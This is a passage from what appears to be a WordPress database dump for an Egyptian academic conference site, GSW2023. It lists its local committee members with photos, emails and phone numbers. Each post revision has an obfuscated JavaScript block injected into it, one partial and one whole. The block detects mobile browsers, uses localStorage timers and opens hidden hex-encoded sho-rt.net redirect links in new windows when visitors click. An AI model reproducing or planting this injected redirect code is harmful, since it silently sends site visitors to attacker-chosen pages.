ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-08-13 20:12:20','2023-08-13 20:12:20','',4849,'https://gsw2023.com/?p=5163',0,'revision','',0),
(5164,1,'2023-08-13 20:14:58','2023-08-13 20:14:58','[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\r\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\r\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\r\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5160\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/zaki-212x300.jpg\" alt=\"\" width=\"108\" height=\"153\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1 alignnone wp-image-5159\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/dr-radwa-267x300.jpg\" alt=\"\" width=\"147\" height=\"165\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Web Director\r\nGSW2023, Egypt\r\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span>\r\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span>\r\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span>\r\n<span style=\"font-size: 12pt;\">Security Engineer</span>\r\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span>\r\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong>\r\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span>\r\nDirector of Events and conferences Department\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>yasserelrashidi@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201270059999</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span>\r\nLocal financial Director, GSW2023, Egypt\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>Email:</td>\r\n<td>mohamed_abdallah20102002@yahoo.com</td>\r\n</tr>\r\n<tr>\r\n<td>Mobile:</td>\r\n<td>+201141401861</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 